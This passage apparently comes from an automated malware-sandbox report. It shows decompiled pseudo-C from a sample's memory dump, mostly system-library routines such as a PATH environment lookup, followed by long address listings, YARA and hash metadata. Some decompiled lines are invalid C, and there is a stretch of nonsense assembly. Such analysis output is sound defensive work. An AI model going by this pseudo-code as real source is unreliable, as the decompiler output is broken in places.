													_t309 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t292 = _t292 + 1;
									_v16 = _t292;
									__eflags = _t292 - _v48;
								} while (_t292 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t236 =  *(_v60 + _t320 * 4);
						if(_t236 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t236 * 4 +  &M030F2935))) {
							case 0:
								__ax =  *0x31b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t309 =  &_v64;
								_v80 = E030F2E3E(0,  &_v64);
								_t275 = _t275 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x31b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x31b8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E030DEEF0(0x31b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E030DEB70(__ecx, 0x31b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t210 = _v72;
											__eflags = _t210;
											if(_t210 != 0) {
												L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t210);
											}
											_t211 = _v52;
											__eflags = _t211;
											if(_t211 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
													_t211 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t288 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x31b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E030DEB70(__ecx, 0x31b79a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t334;
										_pop(_t276);
										return E0310B640(_t211, _t276, _v8 ^ _t334, _t309, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t271 = _v56;
								if(_v56 != 0) {
									_t309 =  &_v36;
									_t273 = E030F2E3E(_t271,  &_v36);
									_t288 = _v36;
									_v76 = _t273;
								}
								if(_t288 == 0) {
									goto L44;
								} else {
									_t275 = _t275 + 2 + _t288;
								}
								goto L14;
							case 6:
								__eax =  *0x31b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x31b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x31b8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x31b6e58 & 0x0000ffff;
								__eax = ( *0x31b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t309 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t293 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("daa");
					asm("adc eax, [ebx]");
					_t342 = _t236 <<  *[es:esi+0x28] <<  *0x1f030f26;
					 *_t322 =  *_t322 - _t293;
					 *_t322 =  *_t322 - _t293;
					asm("daa");
					 *_t322 =  *_t322 - _t293;
					_pop(_t284);
					asm("adc eax, [ebx]");
					_t331 = _t327 +  *0x203135b <<  *(_t342 + _t284 * 2);
					asm("adc eax, [ebx]");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x319ff00);
					E0311D08C(_t284, _t322, _t331);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t285 = _a12;
					__eflags = _t285;
					if(_t285 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t299 = _t246 * 0xc;
							_v48 = _t299;
							__eflags = _t285 -  *((intOrPtr*)(_t299 + 0x30a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E0310E5C0(_a8,  *((intOrPtr*)(_t299 + 0x30a1668)), _t285);
									_t342 = _t342 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t332 = E031451BE(_t285,  *((intOrPtr*)(_v48 + 0x30a166c)), _a16, _t323, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t295 = _a4;
								__eflags = _t295;
								if(_t295 != 0) {
									_v36 = _t295;
									__eflags =  *_t295 - _t323;
									if( *_t295 == _t323) {
										_t332 = 0xc0000100;
										goto L76;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t295;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t295) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L106:
												_t332 = E030F2AE4( &_v36, _a8, _t285, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L69;
												} else {
													_t323 = 1;
													_t295 = _v36;
													goto L75;
												}
											} else {
												_t251 = E030D6600( *(_t311 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t295 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t332 = E030F2C50(_t295, _a8, _t285, _a16, _a20, _a24, _t323);
											L76:
											_v32 = _t332;
											goto L69;
										}
									}
									goto L108;
								} else {
									E030DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t258 = E030F2AE4( &_v36, _a8, _t285, _a16, _a20, _t332);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E030F2C50(_v36, _a8, _t285, _a16, _a20, _t332, 1);
									}
									_v8 = _t323;
									E030F2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t332;
					}
					L70:
					return E0311D0D1(_t244);
				}
				L108:
			}





















































                                                                                                                                                    0x030f2584
                                                                                                                                                    0x030f2586
                                                                                                                                                    0x030f2590
                                                                                                                                                    0x030f2596
                                                                                                                                                    0x030f2597
                                                                                                                                                    0x030f2598
                                                                                                                                                    0x030f2599
                                                                                                                                                    0x030f259e
                                                                                                                                                    0x030f25a4
                                                                                                                                                    0x030f25a9
                                                                                                                                                    0x030f25ac
                                                                                                                                                    0x030f25ae
                                                                                                                                                    0x030f25b1
                                                                                                                                                    0x030f25b2
                                                                                                                                                    0x030f25b5
                                                                                                                                                    0x030f25b8
                                                                                                                                                    0x030f25bb
                                                                                                                                                    0x030f25bc
                                                                                                                                                    0x030f25bf
                                                                                                                                                    0x030f25c2
                                                                                                                                                    0x030f25c5
                                                                                                                                                    0x030f25c6
                                                                                                                                                    0x030f25cb
                                                                                                                                                    0x030f25ce
                                                                                                                                                    0x030f25d8
                                                                                                                                                    0x030f25db
                                                                                                                                                    0x030f25dd
                                                                                                                                                    0x030f25de
                                                                                                                                                    0x030f25e1
                                                                                                                                                    0x030f25e3
                                                                                                                                                    0x030f25e9
                                                                                                                                                    0x030f26da
                                                                                                                                                    0x030f26da
                                                                                                                                                    0x030f26dd
                                                                                                                                                    0x030f26e2
                                                                                                                                                    0x03135b56
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f26e8
                                                                                                                                                    0x030f26f9
                                                                                                                                                    0x030f26fb
                                                                                                                                                    0x030f26fe
                                                                                                                                                    0x030f2700
                                                                                                                                                    0x03135b60
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2706
                                                                                                                                                    0x030f2706
                                                                                                                                                    0x030f270a
                                                                                                                                                    0x030f270a
                                                                                                                                                    0x030f270d
                                                                                                                                                    0x030f2713
                                                                                                                                                    0x030f2716
                                                                                                                                                    0x030f2718
                                                                                                                                                    0x030f271c
                                                                                                                                                    0x030f271e
                                                                                                                                                    0x03135b6c
                                                                                                                                                    0x03135b6f
                                                                                                                                                    0x03135b7f
                                                                                                                                                    0x03135b89
                                                                                                                                                    0x03135b8e
                                                                                                                                                    0x03135b93
                                                                                                                                                    0x03135b96
                                                                                                                                                    0x03135b9c
                                                                                                                                                    0x03135ba0
                                                                                                                                                    0x03135ba3
                                                                                                                                                    0x03135bab
                                                                                                                                                    0x03135bb0
                                                                                                                                                    0x03135bb3
                                                                                                                                                    0x03135bb3
                                                                                                                                                    0x03135ba3
                                                                                                                                                    0x030f2724
                                                                                                                                                    0x030f2726
                                                                                                                                                    0x030f2729
                                                                                                                                                    0x030f272c
                                                                                                                                                    0x030f279d
                                                                                                                                                    0x030f279d
                                                                                                                                                    0x030f27a0
                                                                                                                                                    0x030f27a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f272e
                                                                                                                                                    0x030f272e
                                                                                                                                                    0x030f2731
                                                                                                                                                    0x030f2734
                                                                                                                                                    0x030f2734
                                                                                                                                                    0x030f2736
                                                                                                                                                    0x03135bc1
                                                                                                                                                    0x03135bc1
                                                                                                                                                    0x03135bc4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135bca
                                                                                                                                                    0x03135bca
                                                                                                                                                    0x03135bcd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135bd3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135bd3
                                                                                                                                                    0x03135bcd
                                                                                                                                                    0x030f273c
                                                                                                                                                    0x030f273c
                                                                                                                                                    0x030f2742
                                                                                                                                                    0x030f2747
                                                                                                                                                    0x030f274a
                                                                                                                                                    0x030f274d
                                                                                                                                                    0x030f2750
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2756
                                                                                                                                                    0x030f2756
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2902
                                                                                                                                                    0x030f2908
                                                                                                                                                    0x030f290b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2911
                                                                                                                                                    0x030f291c
                                                                                                                                                    0x030f2921
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2921
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2880
                                                                                                                                                    0x030f2887
                                                                                                                                                    0x030f288c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2805
                                                                                                                                                    0x030f280a
                                                                                                                                                    0x030f2814
                                                                                                                                                    0x030f2816
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f281e
                                                                                                                                                    0x030f2821
                                                                                                                                                    0x030f2823
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2829
                                                                                                                                                    0x030f2829
                                                                                                                                                    0x030f2831
                                                                                                                                                    0x030f283c
                                                                                                                                                    0x030f283e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f283e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f284e
                                                                                                                                                    0x030f2850
                                                                                                                                                    0x030f2851
                                                                                                                                                    0x030f2854
                                                                                                                                                    0x030f2857
                                                                                                                                                    0x030f285a
                                                                                                                                                    0x030f285c
                                                                                                                                                    0x030f285d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f275d
                                                                                                                                                    0x030f2761
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2767
                                                                                                                                                    0x030f276e
                                                                                                                                                    0x030f2773
                                                                                                                                                    0x030f2773
                                                                                                                                                    0x030f2776
                                                                                                                                                    0x030f2778
                                                                                                                                                    0x030f277e
                                                                                                                                                    0x030f277e
                                                                                                                                                    0x030f2781
                                                                                                                                                    0x030f2781
                                                                                                                                                    0x030f2783
                                                                                                                                                    0x030f2784
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135bd8
                                                                                                                                                    0x03135bde
                                                                                                                                                    0x03135be4
                                                                                                                                                    0x03135be6
                                                                                                                                                    0x03135be8
                                                                                                                                                    0x03135be9
                                                                                                                                                    0x03135bee
                                                                                                                                                    0x03135bf8
                                                                                                                                                    0x03135bff
                                                                                                                                                    0x03135c01
                                                                                                                                                    0x03135c04
                                                                                                                                                    0x03135c07
                                                                                                                                                    0x03135c0b
                                                                                                                                                    0x03135c0d
                                                                                                                                                    0x03135c0d
                                                                                                                                                    0x03135c15
                                                                                                                                                    0x03135c18
                                                                                                                                                    0x03135c1b
                                                                                                                                                    0x03135c1b
                                                                                                                                                    0x03135c1e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f28c3
                                                                                                                                                    0x030f28c8
                                                                                                                                                    0x030f28d2
                                                                                                                                                    0x030f28d4
                                                                                                                                                    0x030f28d8
                                                                                                                                                    0x030f28db
                                                                                                                                                    0x03135c26
                                                                                                                                                    0x03135c28
                                                                                                                                                    0x03135c2d
                                                                                                                                                    0x03135c2d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135c34
                                                                                                                                                    0x03135c36
                                                                                                                                                    0x03135c49
                                                                                                                                                    0x03135c4e
                                                                                                                                                    0x03135c54
                                                                                                                                                    0x03135c5b
                                                                                                                                                    0x03135c5d
                                                                                                                                                    0x03135c60
                                                                                                                                                    0x030f2788
                                                                                                                                                    0x030f2788
                                                                                                                                                    0x030f278b
                                                                                                                                                    0x030f278e
                                                                                                                                                    0x030f278e
                                                                                                                                                    0x030f278e
                                                                                                                                                    0x030f2791
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2756
                                                                                                                                                    0x030f2750
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2794
                                                                                                                                                    0x030f2794
                                                                                                                                                    0x030f2795
                                                                                                                                                    0x030f2798
                                                                                                                                                    0x030f2798
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2734
                                                                                                                                                    0x030f272c
                                                                                                                                                    0x030f2700
                                                                                                                                                    0x030f25ef
                                                                                                                                                    0x030f25ef
                                                                                                                                                    0x030f25ef
                                                                                                                                                    0x030f25f2
                                                                                                                                                    0x030f25f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f25fe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f28e6
                                                                                                                                                    0x030f28ec
                                                                                                                                                    0x030f28ef
                                                                                                                                                    0x030f28f5
                                                                                                                                                    0x030f28f8
                                                                                                                                                    0x030f28f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f28f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2866
                                                                                                                                                    0x030f2866
                                                                                                                                                    0x030f2876
                                                                                                                                                    0x030f2879
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f27e0
                                                                                                                                                    0x030f27e7
                                                                                                                                                    0x030f27e9
                                                                                                                                                    0x030f27eb
                                                                                                                                                    0x03135afd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135afd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2633
                                                                                                                                                    0x030f2638
                                                                                                                                                    0x030f263b
                                                                                                                                                    0x030f263c
                                                                                                                                                    0x030f263e
                                                                                                                                                    0x030f2640
                                                                                                                                                    0x030f2642
                                                                                                                                                    0x030f2647
                                                                                                                                                    0x030f2649
                                                                                                                                                    0x030f264e
                                                                                                                                                    0x030f2650
                                                                                                                                                    0x030f2653
                                                                                                                                                    0x030f2659
                                                                                                                                                    0x030f26a2
                                                                                                                                                    0x030f26a7
                                                                                                                                                    0x030f26ac
                                                                                                                                                    0x030f26b2
                                                                                                                                                    0x03135b11
                                                                                                                                                    0x03135b15
                                                                                                                                                    0x03135b17
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f26b8
                                                                                                                                                    0x030f26b8
                                                                                                                                                    0x030f26ba
                                                                                                                                                    0x030f27a6
                                                                                                                                                    0x030f27a6
                                                                                                                                                    0x030f27a9
                                                                                                                                                    0x030f27ab
                                                                                                                                                    0x030f27b9
                                                                                                                                                    0x030f27b9
                                                                                                                                                    0x030f27be
                                                                                                                                                    0x030f27c1
                                                                                                                                                    0x030f27c3
                                                                                                                                                    0x030f27c5
                                                                                                                                                    0x030f27c7
                                                                                                                                                    0x03135c74
                                                                                                                                                    0x03135c79
                                                                                                                                                    0x03135c79
                                                                                                                                                    0x030f27c7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f26c0
                                                                                                                                                    0x030f26c0
                                                                                                                                                    0x030f26c3
                                                                                                                                                    0x030f26c6
                                                                                                                                                    0x030f26c6
                                                                                                                                                    0x030f26c9
                                                                                                                                                    0x030f26c9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f26c9
                                                                                                                                                    0x030f26ba
                                                                                                                                                    0x030f265b
                                                                                                                                                    0x030f265b
                                                                                                                                                    0x030f265e
                                                                                                                                                    0x030f2667
                                                                                                                                                    0x030f266d
                                                                                                                                                    0x030f2677
                                                                                                                                                    0x030f267c
                                                                                                                                                    0x030f267f
                                                                                                                                                    0x030f2681
                                                                                                                                                    0x03135b49
                                                                                                                                                    0x03135b4e
                                                                                                                                                    0x030f27cd
                                                                                                                                                    0x030f27d0
                                                                                                                                                    0x030f27d1
                                                                                                                                                    0x030f27d2
                                                                                                                                                    0x030f27d4
                                                                                                                                                    0x030f27dd
                                                                                                                                                    0x030f2687
                                                                                                                                                    0x030f2687
                                                                                                                                                    0x030f268a
                                                                                                                                                    0x030f268b
                                                                                                                                                    0x030f268e
                                                                                                                                                    0x030f268f
                                                                                                                                                    0x030f2691
                                                                                                                                                    0x030f2696
                                                                                                                                                    0x030f2698
                                                                                                                                                    0x030f269d
                                                                                                                                                    0x030f269f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f269f
                                                                                                                                                    0x030f2681
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2846
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2605
                                                                                                                                                    0x030f260a
                                                                                                                                                    0x030f260c
                                                                                                                                                    0x030f2611
                                                                                                                                                    0x030f2616
                                                                                                                                                    0x030f2619
                                                                                                                                                    0x030f2619
                                                                                                                                                    0x030f261e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2624
                                                                                                                                                    0x030f2627
                                                                                                                                                    0x030f2627
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135b1f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2894
                                                                                                                                                    0x030f289b
                                                                                                                                                    0x030f289d
                                                                                                                                                    0x030f28a1
                                                                                                                                                    0x03135b2b
                                                                                                                                                    0x03135b2e
                                                                                                                                                    0x03135b2e
                                                                                                                                                    0x030f28a7
                                                                                                                                                    0x030f28a9
                                                                                                                                                    0x03135b04
                                                                                                                                                    0x03135b09
                                                                                                                                                    0x03135b09
                                                                                                                                                    0x03135b09
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135b35
                                                                                                                                                    0x03135b3c
                                                                                                                                                    0x030f28fb
                                                                                                                                                    0x030f28fb
                                                                                                                                                    0x030f26cc
                                                                                                                                                    0x030f26cc
                                                                                                                                                    0x030f26d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f26d2
                                                                                                                                                    0x030f26d2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f26d2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f25fe
                                                                                                                                                    0x030f292d
                                                                                                                                                    0x030f292f
                                                                                                                                                    0x030f2930
                                                                                                                                                    0x030f2935
                                                                                                                                                    0x030f293e
                                                                                                                                                    0x030f294f
                                                                                                                                                    0x030f2951
                                                                                                                                                    0x030f2952
                                                                                                                                                    0x030f295a
                                                                                                                                                    0x030f2962
                                                                                                                                                    0x030f2966
                                                                                                                                                    0x030f2972
                                                                                                                                                    0x030f2973
                                                                                                                                                    0x030f2977
                                                                                                                                                    0x030f297b
                                                                                                                                                    0x030f297d
                                                                                                                                                    0x030f297e
                                                                                                                                                    0x030f297f
                                                                                                                                                    0x030f2980
                                                                                                                                                    0x030f2981
                                                                                                                                                    0x030f2982
                                                                                                                                                    0x030f2983
                                                                                                                                                    0x030f2984
                                                                                                                                                    0x030f2985
                                                                                                                                                    0x030f2986
                                                                                                                                                    0x030f2987
                                                                                                                                                    0x030f2988
                                                                                                                                                    0x030f2989
                                                                                                                                                    0x030f298a
                                                                                                                                                    0x030f298b
                                                                                                                                                    0x030f298c
                                                                                                                                                    0x030f298d
                                                                                                                                                    0x030f298e
                                                                                                                                                    0x030f298f
                                                                                                                                                    0x030f2990
                                                                                                                                                    0x030f2992
                                                                                                                                                    0x030f2997
                                                                                                                                                    0x030f29a3
                                                                                                                                                    0x030f29a6
                                                                                                                                                    0x030f29ab
                                                                                                                                                    0x030f29ad
                                                                                                                                                    0x030f29b0
                                                                                                                                                    0x030f29b2
                                                                                                                                                    0x03135c80
                                                                                                                                                    0x030f29b8
                                                                                                                                                    0x030f29b8
                                                                                                                                                    0x030f29bb
                                                                                                                                                    0x030f29c0
                                                                                                                                                    0x030f29c5
                                                                                                                                                    0x030f29c6
                                                                                                                                                    0x030f29c6
                                                                                                                                                    0x030f29c9
                                                                                                                                                    0x030f29cb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f29cd
                                                                                                                                                    0x030f29d0
                                                                                                                                                    0x030f29d9
                                                                                                                                                    0x030f29db
                                                                                                                                                    0x030f29dd
                                                                                                                                                    0x030f2a7f
                                                                                                                                                    0x030f2a84
                                                                                                                                                    0x030f2a87
                                                                                                                                                    0x030f2a89
                                                                                                                                                    0x03135ca1
                                                                                                                                                    0x03135ca3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2a8f
                                                                                                                                                    0x030f2a8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2a8f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f29e3
                                                                                                                                                    0x030f29e3
                                                                                                                                                    0x030f29e3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f29e3
                                                                                                                                                    0x030f29dd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f29db
                                                                                                                                                    0x030f29e6
                                                                                                                                                    0x030f29e9
                                                                                                                                                    0x030f29eb
                                                                                                                                                    0x030f29ed
                                                                                                                                                    0x030f29f3
                                                                                                                                                    0x030f29f5
                                                                                                                                                    0x030f29f8
                                                                                                                                                    0x030f29fa
                                                                                                                                                    0x030f2a97
                                                                                                                                                    0x030f2a9a
                                                                                                                                                    0x030f2a9d
                                                                                                                                                    0x030f2add
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2a9f
                                                                                                                                                    0x030f2aa2
                                                                                                                                                    0x030f2aa5
                                                                                                                                                    0x030f2aa8
                                                                                                                                                    0x030f2aab
                                                                                                                                                    0x03135cab
                                                                                                                                                    0x03135caf
                                                                                                                                                    0x03135cc5
                                                                                                                                                    0x03135cda
                                                                                                                                                    0x03135cdc
                                                                                                                                                    0x03135cdf
                                                                                                                                                    0x03135ce5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135ceb
                                                                                                                                                    0x03135ced
                                                                                                                                                    0x03135cee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135cee
                                                                                                                                                    0x03135cb1
                                                                                                                                                    0x03135cb4
                                                                                                                                                    0x03135cb9
                                                                                                                                                    0x03135cbb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135cbd
                                                                                                                                                    0x03135cbd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03135cbd
                                                                                                                                                    0x03135cbb
                                                                                                                                                    0x030f2ab1
                                                                                                                                                    0x030f2ab1
                                                                                                                                                    0x030f2ac4
                                                                                                                                                    0x030f2ac6
                                                                                                                                                    0x030f2ac6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2ac6
                                                                                                                                                    0x030f2aab
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f2a00
                                                                                                                                                    0x030f2a09
                                                                                                                                                    0x030f2a0e
                                                                                                                                                    0x030f2a21
                                                                                                                                                    0x030f2a24
                                                                                                                                                    0x030f2a35
                                                                                                                                                    0x030f2a3a
                                                                                                                                                    0x030f2a3d
                                                                                                                                                    0x030f2a42
                                                                                                                                                    0x030f2a59
                                                                                                                                                    0x030f2a59
                                                                                                                                                    0x030f2a5c
                                                                                                                                                    0x030f2a5f
                                                                                                                                                    0x030f2a5f
                                                                                                                                                    0x030f29fa
                                                                                                                                                    0x030f29f3
                                                                                                                                                    0x030f2a64
                                                                                                                                                    0x030f2a64
                                                                                                                                                    0x030f2a6b
                                                                                                                                                    0x030f2a6b
                                                                                                                                                    0x030f2a6d
                                                                                                                                                    0x030f2a72
                                                                                                                                                    0x030f2a72
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PATH
                                                                                                                                                    • API String ID: 0-1036084923
                                                                                                                                                    • Opcode ID: 53bfd0c0661c70a75caa46096cb536e2ebdf99ffba09284d99ab68bbb39043f4
                                                                                                                                                    • Instruction ID: 2e3574004f5ea5bd9dea2b28e0e01d999a2878f2cb08501f49b2a4b47f291bae
                                                                                                                                                    • Opcode Fuzzy Hash: 53bfd0c0661c70a75caa46096cb536e2ebdf99ffba09284d99ab68bbb39043f4
                                                                                                                                                    • Instruction Fuzzy Hash: 6BC19079E02319DFCB24DF99D880BEEB7B9FF48710F184829E541AB690D774A941CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FFAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E030FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E030DEEF0(0x31b7b60);
					_t134 =  *0x31b7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
